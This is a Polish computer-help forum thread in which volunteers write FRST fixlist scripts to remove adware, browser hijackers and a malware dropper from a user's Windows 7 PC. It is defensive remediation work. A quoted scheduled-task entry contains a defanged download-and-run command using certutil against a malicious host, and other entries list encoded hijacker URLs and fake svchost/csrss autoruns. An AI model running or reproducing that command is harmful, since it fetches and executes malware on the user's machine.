logo elektroda
logo elektroda
X
logo elektroda
Szukanie Zaawansowane
logo elektroda
REKLAMA
REKLAMA
Adblock/uBlockOrigin/AdGuard mogą powodować znikanie niektórych postów z powodu nowej reguły.

Stworzenie skryptu fixlist.txt dla FRST - problem z uprawnieniami i wirusem

CamtraX 23 Maj 2019 11:32 891 19
REKLAMA
Zgłoś naruszenie prawa
Odpowiedz | Nowy temat
  • #1 17976244
    CamtraX
    Poziom 6  
    Posty: 15
    Ocena: 6
    Witam, proszę o stworzenie skryptu naprawy fixlist.txt.
    Złapałem zapewne wirusa > Klient nie ma wystarczających uprawnień - nie mogę nawet aktualizować programów.
    Wszystkie zbędne programy do odinstalowania jeżeli pomoże - choć nic ostatnimi czasy nie instalowałem > 3miesiące +/- zmieniłem 360 na nową ochronę SecureAPlus ale problem jest od kilku dni
    W załączeniu oczywiście plik z FRST jeden się tylko auto-utworzył po skanowaniu.

    PS czytam i czytam tworzenie fixlist.txt i czarno widzę 8-O
    Załączniki:
    • FRST.txt (62.92 KB) Musisz być zalogowany, aby pobrać ten załącznik.
  • REKLAMA
  • #2 17977427
    RADU23
    VIP Zasłużony dla elektroda
    Posty: 20717
    Pomógł: 2426
    Ocena: 1727
    CamtraX napisał:
    W załączeniu oczywiście plik z FRST jeden się tylko auto-utworzył po skanowaniu.

    Ponieważ nie zaznaczył kolega by wygenerowało również Addition.txt
    Stworzenie skryptu fixlist.txt dla FRST - problem z uprawnieniami i wirusem


    Odinstaluj:
    - CPU-Z

    Otwórz notatnik i wklej zawartość:
    Cytat:
    GroupPolicy: Ograniczenia ? <==== UWAGA
    Task: {2FE5F5B3-26EB-48D0-A3D7-85FB3C713D56} - System32\Tasks\{14B168E8-57E4-45F2-8D22-3CA77262DB63} => C:\Windows\system32\pcalua.exe -a F:\hp8300\sp70418.exe -d F:\hp8300
    Task: {A98D5BBC-C9A6-4F8D-A3C9-744E872E9C72} - \ASCU11_PerformanceMonitor -> Brak pliku <==== UWAGA
    Task: {C369373A-8608-4C95-85E2-151C5E48B44E} - System32\Tasks\{E907FD8C-A176-44E8-A9B7-8A6C36068A97} => C:\Windows\system32\pcalua.exe -a F:\hp8300\chipset\sp57137.exe -d F:\hp8300\chipset
    S2 saappsvc; "C:\Program Files\SecureAge\Whitelist\saappsvc.exe" [X]
    S2 SecureAPlusService; "C:\Program Files\SecureAge\Whitelist\SecureAPlusService.exe" [X]
    S3 cpuz138; \??\C:\Users\HP\AppData\Local\Temp\cpuz138\cpuz138_x64.sys [X] <==== UWAGA
    S4 IUFileFilter; \??\C:\Program Files (x86)\IObit\IObit Uninstaller\drivers\win7_amd64\IUFileFilter.sys [X]

    Plik zapisz pod nazwą fixlist.txt i umieść w folderze gdzie masz FRST.exe.
    Uruchom FRST i kliknij w Fix/Napraw.
  • #3 17977604
    CamtraX
    Poziom 6  
    Posty: 15
    Ocena: 6
    Dziękuje za podjęcie tematu ale nie ma poprawy,
    załączam plik który utworzył się po wykonaniu naprawy.
    Co nabroiłem iż jest komunikat o braku uprawnień?
    .
    Nie zaznaczyłem bo brak :(
    Stworzenie skryptu fixlist.txt dla FRST - problem z uprawnieniami i wirusem
    Ale po odpaleniu FRST64 na innym kompie w systemie wygląda jak załączyłeś.
    Załączniki:
    • Fixlog.txt (2.47 KB) Musisz być zalogowany, aby pobrać ten załącznik.
  • REKLAMA
  • #4 17977770
    Kolobos
    Spec od komputerów
    Posty: 85156
    Pomógł: 17160
    Ocena: 10424
    Odinstaluj:
    SecureAPlus.
    Advanced SystemCare

    Fixlist usunie SecureAPlus.

    Wykonaj Fixlist.txt dla FRST:
    CloseProcesses:
    HKLM\...\Run: [SAAppWhitelistingNotifier] => C:\Program Files\SecureAge\Whitelist\sanotifier.exe
    HKLM\...\Run: [SecureAPlus] => "C:\Program Files\SecureAge\Whitelist\SecureAPlus.exe" /tray
    HKU\HP\...\RunOnce: [Application Restart #0] => C:\Program Files\Mozilla Firefox\firefox.exe [566224 2019-05-22] (Mozilla Corporation -> Mozilla Corporation)
    GroupPolicy: Ograniczenia ? <==== UWAGA
    Task: {048521AB-610F-4F30-8EB6-B8E9A827F932} - System32\Tasks\DriverDoc Auto Start => C:\Program Files (x86)\Solvusoft\DriverDoc\DriverDoc.exe [1123016 2018-03-16] (Solvusoft Corporation -> Solvusoft Corporation)
    Task: {2FE5F5B3-26EB-48D0-A3D7-85FB3C713D56} - System32\Tasks\{14B168E8-57E4-45F2-8D22-3CA77262DB63} => C:\Windows\system32\pcalua.exe -a F:\hp8300\sp70418.exe -d F:\hp8300
    Task: {9FC57AF2-3B6B-4349-86D2-395DABC650D5} - System32\Tasks\ASC12_PerformanceMonitor => C:\Program Files (x86)\IObit\Advanced SystemCare\Monitor.exe [3161360 2019-04-24] (IObit Information Technology -> IObit)
    Task: {A98D5BBC-C9A6-4F8D-A3C9-744E872E9C72} - \ASCU11_PerformanceMonitor -> Brak pliku <==== UWAGA
    Task: {C369373A-8608-4C95-85E2-151C5E48B44E} - System32\Tasks\{E907FD8C-A176-44E8-A9B7-8A6C36068A97} => C:\Windows\system32\pcalua.exe -a F:\hp8300\chipset\sp57137.exe -d F:\hp8300\chipset
    Task: {C5CD314A-F9BF-4A61-AE4D-333AA5111616} - System32\Tasks\driver booster skipuac (hp)
    Task: {D38EE3AF-A3F0-49E7-A193-23F5709DD084} - System32\Tasks\driver booster scheduler => C:\Program Files (x86)\IObit\Driver Booster\6.2.1\Scheduler.exe [149776 2018-12-28] (IObit Information Technology -> IObit)
    Task: {D84F839C-CD28-46DB-B5C6-E0E2197EFEA4} - System32\Tasks\ASC12_SkipUac_HP => C:\Program Files (x86)\IObit\Advanced SystemCare\ASC.exe [8689424 2019-03-22] (IObit Information Technology -> IObit)
    Task: C:\Windows\Tasks\DriverDoc Auto Start.job => C:\Program Files (x86)\Solvusoft\DriverDoc\DriverDoc.exe
    S4 AdvancedSystemCareService12; C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe [1266960 2018-11-29] (IObit Information Technology -> IObit)
    S2 sascansvc; C:\Program Files\SecureAge\AntiVirus\sascansvc.exe [1128104 2019-05-10] (SecureAge Technology Pte Ltd -> SecureAge Technology)
    S2 SAUAVSvc; C:\Program Files\SecureAge\UniversalAV\UniversalAVService.exe [1296512 2019-05-10] (SecureAge Technology Pte Ltd -> SecureAge Technology)
    S4 Solvusoft Suite Service; C:\Program Files (x86)\Solvusoft\SuiteService.exe [1285320 2018-03-16] (Solvusoft Corporation -> Solvusoft Corporation)
    S2 saappsvc; "C:\Program Files\SecureAge\Whitelist\saappsvc.exe" [X]
    S2 SecureAPlusService; "C:\Program Files\SecureAge\Whitelist\SecureAPlusService.exe" [X]
    S3 AscFileControl; C:\Program Files (x86)\IObit\Advanced SystemCare\drivers\win7_amd64\AscFileControl.sys [22440 2018-09-20] (IObit Information Technology -> IObit)
    S3 AscFileFilter; C:\Program Files (x86)\IObit\Advanced SystemCare\drivers\win7_amd64\AscFileFilter.sys [25512 2018-09-20] (IObit Information Technology -> IObit)
    S3 AscRegistryFilter; C:\Program Files (x86)\IObit\Advanced SystemCare\drivers\win7_amd64\AscRegistryFilter.sys [25000 2018-07-04] (IObit Information Technology -> IObit)
    S0 SAAppCtl; C:\Windows\System32\DRIVERS\saappctl.sys [295872 2019-04-23] (SecureAge Technology Pte Ltd -> SecureAge Technology)
    S0 sascan; C:\Windows\System32\DRIVERS\sascan.sys [95768 2018-09-11] (SecureAge Technology Pte Ltd -> SecureAge Technology)
    S3 cpuz138; \??\C:\Users\HP\AppData\Local\Temp\cpuz138\cpuz138_x64.sys [X] <==== UWAGA
    S4 IUFileFilter; \??\C:\Program Files (x86)\IObit\IObit Uninstaller\drivers\win7_amd64\IUFileFilter.sys [X]
    2019-05-23 09:04 - 2018-12-21 10:12 - 000000372 _____ C:\Windows\Tasks\DriverDoc Auto Start.job
    2019-05-13 16:49 - 2019-04-11 09:11 - 000002266 _____ C:\Users\Public\Desktop\Advanced SystemCare 12.lnk
  • #5 17978170
    CamtraX
    Poziom 6  
    Posty: 15
    Ocena: 6
    Dzień dobry,
    wykonałem powyższe czynności, sprawdziłem na Firefox - uaktualnił się i działa a FRST64 działa w systemie.
    Załączam pliki dla ew. sprawdzenia co było przyczyną a może coś jeszcze trzeba odinstalować:
    Fixlog po naprawie z wiersza poleceń i FRST i Addition po odpaleniu kompa w systemie.
    Dziękuje bardzo.
    .
    Mam wiarę iż nie nadwyrężę uprzejmości .. przed zgłoszeniem wątku odinstalowałem DriverDog i po uruchomieniu systemu wyskakuje okno: Stworzenie skryptu fixlist.txt dla FRST - problem z uprawnieniami i wirusem
    Programy czyszczące nie pomogły :( Gdzie mogę i co mogę usunąć aby już nie wyskakiwało?
    .
    Jakim subiektywnie programem free zastąpić SecureAPlus aby nie obciążał systemu: Comodo ISP, Windows Defender, inny? dziękuje
    pozdr
    Załączniki:
    • Addition.txt (32.68 KB) Musisz być zalogowany, aby pobrać ten załącznik.
    • FRST.txt (65.67 KB) Musisz być zalogowany, aby pobrać ten załącznik.
    • Fixlog.txt (7.47 KB) Musisz być zalogowany, aby pobrać ten załącznik.
  • #6 17978328
    Konto nie istnieje
    Poziom 1  
  • #7 17996919
    CamtraX
    Poziom 6  
    Posty: 15
    Ocena: 6
    Przepraszam iż tak długo się nie odzywałem, rozjazdy.
    Po zainstalowaniu malwarebytes sytuacja się powtórzyła - nie mam uprawnień do otwarcia.
    Sama instalacja nie miała zapewne wpływu, komp stał bez zabezpieczeń bo wszystkie wg zaleceń odinstalowałem... odpalany przez innych użytkownik - w standardzie winnych brak.

    Załączam nowe pliki FRST i po naprawie zainstaluje program do ochrony aby sytuacja się nie powtórzyła (mile widziane sugestie)
    Nie działa również F8 przy rozruchu,
    Załączniki:
    • FRST.txt (87.34 KB) Musisz być zalogowany, aby pobrać ten załącznik.
    • Addition.txt (30.72 KB) Musisz być zalogowany, aby pobrać ten załącznik.
  • REKLAMA
  • #8 17996929
    Konto nie istnieje
    Poziom 1  
  • #9 17996956
    Kolobos
    Spec od komputerów
    Posty: 85156
    Pomógł: 17160
    Ocena: 10424
    Nie dziala tylko F8 czy ogolnie klawiatura pod dosem? W biosie masz ustawione USB Keyboard support?

    W FRST zaznacz Lista BCD i zamiesc log w zalaczniku.
  • #10 17996957
    CamtraX
    Poziom 6  
    Posty: 15
    Ocena: 6
    tak jak napisałem - Po zainstalowaniu malwarebytes sytuacja się powtórzyła - nie mam uprawnień do otwarcia.
    Tożsama sytuacja jest firefoxem - druga zainstalowana przeglądarka sama się nagminnie odpala z "różnymi dziwnymi" stronami.
    Nie próbuje zainstalować innych za każdym razem odpala od nowa system nawet jak się tego nie chce.
  • #11 17996966
    Konto nie istnieje
    Poziom 1  
  • #12 17996972
    Kolobos
    Spec od komputerów
    Posty: 85156
    Pomógł: 17160
    Ocena: 10424
    Zrob pelny skan przy pomocy mbam oraz adwcleaner i usun to co wykryja.

    Po wszystkim zamiesc nowe logi z FRST, ze skanowania.
  • REKLAMA
  • #13 17997000
    CamtraX
    Poziom 6  
    Posty: 15
    Ocena: 6
    Zrob pelny skan przy pomocy mbam oraz adwcleaner i usun to co wykryja. > nie odpala

    wpierw to : cyt: W FRST zaznacz Lista BCD .. - załącznik

    edit: CloudNet > po odpaleniu kompa jest ponownie zainstalowany - wyskakuje okno
    Stworzenie skryptu fixlist.txt dla FRST - problem z uprawnieniami i wirusem
    Bonjour to dodatek apple (?) chce skasować whatsappa
    Załączniki:
    • FRST.txt (93.58 KB) Musisz być zalogowany, aby pobrać ten załącznik.
    • Addition.txt (30.12 KB) Musisz być zalogowany, aby pobrać ten załącznik.
  • #14 17997028
    Kolobos
    Spec od komputerów
    Posty: 85156
    Pomógł: 17160
    Ocena: 10424
    Uruchom msconfig, w zakladce Rozruch usun Windows Fast Mode i ustaw jako domyslny Windows 7.

    Odinstaluj: CloudNet

    Wykonaj Fixlist.txt dla FRST:
    CloseProcesses:
    ShortcutWithArgument: C:\Users\HP\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP%
    ShortcutWithArgument: C:\Users\HP\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> %SNP%
    ShortcutWithArgument: C:\Users\HP\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP%
    ShortcutWithArgument: C:\Users\HP\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> %SNP%
    ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> %SNP%
    2019-05-31 11:29 - 2019-05-30 22:37 - 006802915 _____ ( ) [Brak podpisu cyfrowego] C:\Users\HP\AppData\Local\Temp\is-4QP63.tmp\Sowrong.exe
    2019-05-31 11:25 - 2019-05-31 11:25 - 000698368 _____ () [Brak podpisu cyfrowego] C:\Program Files (x86)\Google\Chrome\Application\WINMM.dll
    2019-05-31 11:25 - 2019-05-31 11:25 - 000589824 _____ () [Brak podpisu cyfrowego] C:\Users\HP\AppData\Local\App\svchost.exe
    2019-06-05 08:42 - 2008-10-15 16:44 - 000205312 _____ () [Brak podpisu cyfrowego] C:\Users\HP\AppData\Local\Temp\is-F7RU2.tmp\itdownload.dll
    2019-06-05 08:42 - 2019-06-05 08:42 - 000715264 _____ () [Brak podpisu cyfrowego] C:\Users\HP\AppData\Local\Temp\is-P6H87.tmp\Sowrong.tmp
    2019-06-05 08:42 - 2016-04-17 19:16 - 000221184 _____ (Mitrich Software) [Brak podpisu cyfrowego] C:\Users\HP\AppData\Local\Temp\is-F7RU2.tmp\idp.dll
    2019-06-05 08:42 - 2017-05-03 11:31 - 000043520 _____ (Vincenzo Giordano) [Brak podpisu cyfrowego] C:\Users\HP\AppData\Local\Temp\is-F7RU2.tmp\psvince.dll
    Hosts:
    EmptyTemp:
    ( ) [Brak podpisu cyfrowego] C:\Users\HP\AppData\Local\Temp\is-4QP63.tmp\Sowrong.exe
    () [Brak podpisu cyfrowego] C:\Users\HP\AppData\Local\App\svchost.exe
    () [Brak podpisu cyfrowego] C:\Users\HP\AppData\Local\Temp\is-P6H87.tmp\Sowrong.tmp
    HKLM-x32\...\Run: [IObit Malware Fighter] => "C:\Program Files (x86)\IObit\IObit Malware Fighter\IMF.exe" /autostart
    HKLM-x32\...\Run: [360Send] => "C:\ProgramData\360\Send\Send.exe" /StartAsTray
    HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ograniczenia <==== UWAGA
    HKU\S-1-5-21-1954876668-1343596396-4085357382-1000\...\Run: [App] => C:\Users\HP\AppData\Local\App\svchost.exe [589824 2019-05-31] () [Brak podpisu cyfrowego] <==== UWAGA
    HKU\S-1-5-21-1954876668-1343596396-4085357382-1000\...\Run: [1359032] => C:\Users\HP\AppData\Local\Temp\is-4QP63.tmp\Sowrong.exe [6802915 2019-05-30] ( ) [Brak podpisu cyfrowego] <==== UWAGA
    HKU\S-1-5-21-1954876668-1343596396-4085357382-1000\...\Run: [CloudNet] => C:\Users\HP\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [683008 2019-06-03] (EpicNet Inc.) [Brak podpisu cyfrowego] <==== UWAGA
    HKU\S-1-5-21-1954876668-1343596396-4085357382-1000\...\Run: [BrokenGrass] => C:\Windows\rss\csrss.exe [5214720 2019-05-31] () [Brak podpisu cyfrowego] <==== UWAGA
    HKU\S-1-5-21-1954876668-1343596396-4085357382-1000\...\MountPoints2: F - F:\HiSuiteDownLoader.exe
    HKU\S-1-5-21-1954876668-1343596396-4085357382-1000\...\MountPoints2: {254fee71-fc83-11e7-9182-8851fb42822f} - F:\HiSuiteDownLoader.exe
    HKU\S-1-5-21-1954876668-1343596396-4085357382-1000\...\MountPoints2: {36b7e3aa-af52-11e8-ad93-8851fb42822f} - F:\HiSuiteDownLoader.exe
    HKU\S-1-5-21-1954876668-1343596396-4085357382-1000\...\MountPoints2: {9977dbbb-80be-11e7-a91a-8851fb42822f} - F:\AutoRun.exe
    HKU\S-1-5-21-1954876668-1343596396-4085357382-1000\...\MountPoints2: {b262c508-1c96-11e9-92d2-8851fb42822f} - F:\HiSuiteDownLoader.exe
    HKU\S-1-5-21-1954876668-1343596396-4085357382-1000\...\MountPoints2: {b262c50c-1c96-11e9-92d2-8851fb42822f} - F:\HiSuiteDownLoader.exe
    HKU\S-1-5-21-1954876668-1343596396-4085357382-1000\...\MountPoints2: {d148b349-3ba3-11e7-96a4-8851fb42822f} - F:\HiSuiteDownLoader.exe
    AppInit_DLLs: C:\ProgramData\Quoteex\Stantop.dll => C:\ProgramData\Quoteex\Stantop.dll [342528 2019-05-31] () [Brak podpisu cyfrowego]
    AppInit_DLLs-x32: C:\ProgramData\Quoteex\Mathtam.dll => Brak pliku
    GroupPolicy: Ograniczenia - Chrome <==== UWAGA
    CHR HKLM\SOFTWARE\Policies\Google: Ograniczenia <==== UWAGA
    Task: {082648F2-F382-4855-814C-43DDF9A0A6D4} - System32\Tasks\Online Application V2G5 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== UWAGA
    Task: {0E8DB545-85BC-4D21-AAFE-B41C271C4573} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [616320 2018-01-08] (Apple Inc. -> Apple Inc.)
    Task: {17287EA5-C7CB-4D46-8303-9AA1C2A88667} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://nevernews.club/app/app.exe C:\Users\HP\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\HP\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== UWAGA
    Task: {198E6257-6E49-4803-868F-C94E10031290} - System32\Tasks\Online Application V2G3 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== UWAGA
    Task: {2388660C-D7E2-42CC-AB6C-2846A017D9C2} - System32\Tasks\Online Application V2G4 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== UWAGA
    Task: {2FE5F5B3-26EB-48D0-A3D7-85FB3C713D56} - System32\Tasks\{14B168E8-57E4-45F2-8D22-3CA77262DB63} => C:\Windows\system32\pcalua.exe -a F:\hp8300\sp70418.exe -d F:\hp8300
    Task: {57A8A30C-0D8D-4A56-A967-7131B05DF9E8} - System32\Tasks\Online Application V2G1 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== UWAGA
    Task: {5858B2F2-B099-4F57-806A-3E222254CBD0} - System32\Tasks\Uninstaller_SkipUac_HP => C:\Program Files (x86)\IObit\IObit Uninstaller\IObitUninstaler.exe [5292304 2019-02-26] (IObit Information Technology -> IObit)
    Task: {8D714128-FED6-4519-9985-08BC55DDF967} - System32\Tasks\Online Application V2G2 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== UWAGA
    Task: {A98D5BBC-C9A6-4F8D-A3C9-744E872E9C72} - \ASCU11_PerformanceMonitor -> Brak pliku <==== UWAGA
    Task: {C369373A-8608-4C95-85E2-151C5E48B44E} - System32\Tasks\{E907FD8C-A176-44E8-A9B7-8A6C36068A97} => C:\Windows\system32\pcalua.exe -a F:\hp8300\chipset\sp57137.exe -d F:\hp8300\chipset
    Task: {D0EFD74D-65E5-47C9-8860-45ECA1841743} - System32\Tasks\Updater_Online_Application => C:\Program Files (x86)\Microleaves\Online Application\Online Application Updater.exe <==== UWAGA
    Task: {D3016FFF-241B-48C6-A822-D1AC982838EA} - System32\Tasks\Online Application V2G6 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== UWAGA
    Task: {EF2B3BB9-32FE-48B5-85EF-AE3565D247F8} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [5214720 2019-05-31] () [Brak podpisu cyfrowego] <==== UWAGA
    Task: C:\Windows\Tasks\Online Application V2G1.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== UWAGA
    Task: C:\Windows\Tasks\Online Application V2G2.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== UWAGA
    Task: C:\Windows\Tasks\Online Application V2G3.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== UWAGA
    Task: C:\Windows\Tasks\Online Application V2G4.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== UWAGA
    Task: C:\Windows\Tasks\Online Application V2G5.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== UWAGA
    Task: C:\Windows\Tasks\Online Application V2G6.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== UWAGA
    Task: C:\Windows\Tasks\Updater_Online_Application.job => C:\Program Files (x86)\Microleaves\Online Application\Online Application Updater.exe <==== UWAGA
    HKU\S-1-5-21-1954876668-1343596396-4085357382-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoGk3GzeHhcr-ccYvSq_9cIhjyROuGUKgWE8DC81fhCswx1hnJ0pZlr4CJr-GI-swdkp_BEt8dAYdPlp3mKk_Ui1Gw9jy-6mqAds1K_7LtSYCh68RuTkdfDT-ZVr_QEN8zmPS3bF8Cfm59bzHaMOyi1qrai5qAQwFN2o40vwSvL-g&q={searchTerms}
    HKU\S-1-5-21-1954876668-1343596396-4085357382-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoGk3GzeHhcr-ccYvSq_9cIhjyROuGUKgWE8DC81fhCswx1hnJ0pZlr4CJr-GI-swdkp_BEt8dAYdPlp7-THJ17ZipHFcuxIvWlrROS6TtPTDrIixc0ONF9DhbZKuqmRUh6Bcm8VRXFqLZ6x7iRpbtd_1F0V4Y1Q5ZigUuEO-AFe_
    SearchScopes: HKLM -> {59E9C8B1-74FD-4CB6-A815-9E96102F97BD} URL = hxxp://www.google.com/search?hl={language}&q={searchTerms}
    SearchScopes: HKLM-x32 -> DefaultScope {ielnksrch} URL =
    SearchScopes: HKLM-x32 -> ielnksrch URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoGk3GzeHhcr-ccYvSq_9cIhjyROuGUKgWE8DC81fhCswx1hnJ0pZlr4CJr-GI-swdkp_BEt8dAYdPlp3mKk_Ui1Gw9jy-6mqAds1K_7LtSYCh68RuTkdfDT-ZVr_QEN8zmPS3bF8Cfm59bzHaMOyi1qrai5qAQwFN2o40vwSvL-g&q={searchTerms}
    SearchScopes: HKLM-x32 -> {59E9C8B1-74FD-4CB6-A815-9E96102F97BD} URL = hxxp://www.google.com/search?hl={language}&q={searchTerms}
    SearchScopes: HKU\S-1-5-21-1954876668-1343596396-4085357382-1000 -> DefaultScope {ielnksrch} URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoGk3GzeHhcr-ccYvSq_9cIhjyROuGUKgWE8DC81fhCswx1hnJ0pZlr4CJr-GI-swdkp_BEt8dAYdPlp3mKk_Ui1Gw9jy-6mqAds1K_7LtSYCh68RuTkdfDT-ZVr_QEN8zmPS3bF8Cfm59bzHaMOyi1qrai5qAQwFN2o40vwSvL-g&q={searchTerms}
    SearchScopes: HKU\S-1-5-21-1954876668-1343596396-4085357382-1000 -> {59E9C8B1-74FD-4CB6-A815-9E96102F97BD} URL = hxxp://www.google.com/search?hl={language}&q={searchTerms}
    SearchScopes: HKU\S-1-5-21-1954876668-1343596396-4085357382-1000 -> {ielnksrch} URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoGk3GzeHhcr-ccYvSq_9cIhjyROuGUKgWE8DC81fhCswx1hnJ0pZlr4CJr-GI-swdkp_BEt8dAYdPlp3mKk_Ui1Gw9jy-6mqAds1K_7LtSYCh68RuTkdfDT-ZVr_QEN8zmPS3bF8Cfm59bzHaMOyi1qrai5qAQwFN2o40vwSvL-g&q={searchTerms}
    BHO-x32: IObit Ads Removal -> {FFCB3198-32F3-4E8B-9539-4324694ED664} -> C:\Program Files (x86)\IObit\IObit Malware Fighter\Surfing Protection\Adblock\Adblock.dll => Brak pliku
    R2 WinDefender; C:\Windows\windefender.exe [0 0000-00-00] (Odmowa dostępu) <==== UWAGA (Odmowa dostępu)
    R3 Winmon; C:\Windows\System32\drivers\Winmon.sys [0 0000-00-00] () <==== UWAGA (zerobajtowy plik/folder)
    R3 WinmonFS; C:\Windows\System32\drivers\WinmonFS.sys [0 0000-00-00] (Windows (R) Win 7 DDK provider) <==== UWAGA (zerobajtowy plik/folder)
    R1 WinmonProcessMonitor; C:\Windows\System32\drivers\WinmonProcessMonitor.sys [36096 2019-05-31] (WDKTestCert Admin,131666266076831434 -> ) [Brak podpisu cyfrowego]
    S4 IMFMBRProtect; \??\C:\Program Files (x86)\IObit\IObit Malware Fighter\drivers\win7_amd64\IMFMBRProtect.sys [X]
    S4 IMFSafeBox; \??\C:\Program Files (x86)\IObit\IObit Malware Fighter\drivers\win7_amd64\IMFSafeBox.sys [X]
    2019-06-03 17:30 - 2019-06-03 17:30 - 000000000 ____D C:\Users\HP\AppData\Roaming\EpicNet Inc
    2019-05-31 11:38 - 2019-05-31 11:38 - 000000266 __RSH C:\Users\HP\ntuser.pol
    2019-05-31 11:29 - 2019-05-31 11:29 - 000036096 _____ C:\Windows\system32\Drivers\WinmonProcessMonitor.sys
    2019-05-31 11:28 - 2019-06-05 08:46 - 000003472 _____ C:\Windows\System32\Tasks\ScheduledUpdate
    2019-05-31 11:28 - 2019-06-05 08:46 - 000003164 _____ C:\Windows\System32\Tasks\csrss
    2019-05-31 11:26 - 2019-06-05 09:40 - 000000342 _____ C:\Windows\Tasks\Online Application V2G6.job
    2019-05-31 11:26 - 2019-06-05 09:40 - 000000342 _____ C:\Windows\Tasks\Online Application V2G5.job
    2019-05-31 11:26 - 2019-06-05 09:40 - 000000342 _____ C:\Windows\Tasks\Online Application V2G4.job
    2019-05-31 11:26 - 2019-06-05 09:39 - 000000342 _____ C:\Windows\Tasks\Online Application V2G3.job
    2019-05-31 11:26 - 2019-06-05 09:39 - 000000342 _____ C:\Windows\Tasks\Online Application V2G2.job
    2019-05-31 11:26 - 2019-06-05 09:39 - 000000342 _____ C:\Windows\Tasks\Online Application V2G1.job
    2019-05-31 11:26 - 2019-06-03 19:29 - 000000374 _____ C:\Windows\Tasks\Updater_Online_Application.job
    2019-05-31 11:26 - 2019-05-31 11:26 - 000015606 _____ C:\Windows\SysWOW64\findit.xml
    2019-05-31 11:26 - 2019-05-31 11:26 - 000003206 _____ C:\Windows\System32\Tasks\Updater_Online_Application
    2019-05-31 11:26 - 2019-05-31 11:26 - 000003170 _____ C:\Windows\System32\Tasks\Online Application V2G6
    2019-05-31 11:26 - 2019-05-31 11:26 - 000003170 _____ C:\Windows\System32\Tasks\Online Application V2G5
    2019-05-31 11:26 - 2019-05-31 11:26 - 000003170 _____ C:\Windows\System32\Tasks\Online Application V2G4
    2019-05-31 11:26 - 2019-05-31 11:26 - 000003170 _____ C:\Windows\System32\Tasks\Online Application V2G3
    2019-05-31 11:26 - 2019-05-31 11:26 - 000003170 _____ C:\Windows\System32\Tasks\Online Application V2G2
    2019-05-31 11:26 - 2019-05-31 11:26 - 000003170 _____ C:\Windows\System32\Tasks\Online Application V2G1
    2019-05-31 11:26 - 2019-05-31 11:26 - 000000000 ____D C:\Users\HP\AppData\Local\AdvinstAnalytics
    2019-05-31 11:25 - 2019-06-02 16:46 - 000000000 ____D C:\Users\HP\AppData\Local\App
    2019-05-31 11:25 - 2019-06-02 16:46 - 000000000 ____D C:\ProgramData\Quoteex
    2019-05-31 11:25 - 2019-06-02 16:46 - 000000000 ____D C:\ProgramData\Logic Cramble
    2019-05-31 11:25 - 2019-06-02 16:46 - 000000000 ____D C:\ProgramData\CloudPrinter
    2019-05-31 11:25 - 2019-05-31 12:28 - 000722944 _____ C:\Users\HP\AppData\Local\sha.db
    2019-05-31 11:25 - 2019-05-31 11:25 - 007942656 _____ C:\Users\HP\AppData\Local\agent.dat
    2019-05-31 11:25 - 2019-05-31 11:25 - 002038659 _____ C:\Users\HP\AppData\Local\IceFresh.tst
    2019-05-31 11:25 - 2019-05-31 11:25 - 001630720 _____ (TODO: <Company name>) C:\Users\HP\AppData\Local\IceFresh.exe
    2019-05-31 11:25 - 2019-05-31 11:25 - 001630720 _____ (TODO: <Company name>) C:\Users\HP\AppData\Local\Betafinity.exe
    2019-05-31 11:25 - 2019-05-31 11:25 - 000140800 _____ C:\Users\HP\AppData\Local\installer.dat
